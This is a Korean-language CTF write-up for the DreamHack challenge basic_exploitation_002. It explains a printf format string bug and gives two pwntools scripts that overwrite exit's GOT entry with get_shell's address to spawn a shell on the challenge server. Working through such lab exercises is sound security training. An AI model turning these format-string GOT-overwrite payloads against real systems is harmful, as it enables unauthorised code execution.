[DreamHack] basic_exploitation_002 | Notion

Source Code

printf에 따로 Format 지정을 안함으로 인해 FSB가 발생
- 0x80 만큼 크기를 지정해 입력받으므로 overflow는 아니다.
- NX-bit 또한 활성화 되어 있다.
exit로 인해 종료가 되어버리므로, exit의 got를 get_shell로 바꿔주면 get_shell이 실행되어 flag를 얻을 수 있다.
- Global Offset Table(GOT) : PLT에서 호출하는 resolve 함수를 통해 구한 라이브러리 함수의 절대 주소가 저장되어 있는 테이블입니다
- https://dreamhack.io/learn/2/3#8
exit_got

get_shell

Exploit

Pwntools - fmtstr

Format string bug exploitation tools
https://docs.pwntools.com/en/stable/fmtstr.html

from pwn import *

p = process('./basic_exploitation_002')
p = remote('host1.dreamhack.games', 23968)
e = ELF('./basic_exploitation_002')
get_shell = e.symbols['get_shell'] # get 0x8048609
exit_got = e.got['exit'] # get 0x804a024

p.sendline(fmtstr_payload(1,{exit_got:get_shell})) # Overwrite exit_got with the address of get_shell.
p.interactive()

Raw

from pwn import*
 
p = process('./basic_exploitation_002')
p = remote('host1.dreamhack.games', 23968)
e = ELF('./basic_exploitation_002')
exit_got = e.got['exit'] # get 0x804a024

payload = p32(exit_got+2) # 0x804 / 4byte
payload += p32(exit_got) # 0x8609 / 4byte
payload += b"%2044c%1$hn%32261c%2$hn"
# 2044 = 0x804-0x8 / 32261 = 0x8609-0x804
p.send(payload)
p.interactive()

0x8048609의 값이 너무 크기에 2바이트씩 사용(Func-TIMEOUT)

payload = p32(exit_got+2) # 0x804 / 4byte
payload += p32(exit_got) # 0x8609 / 4byte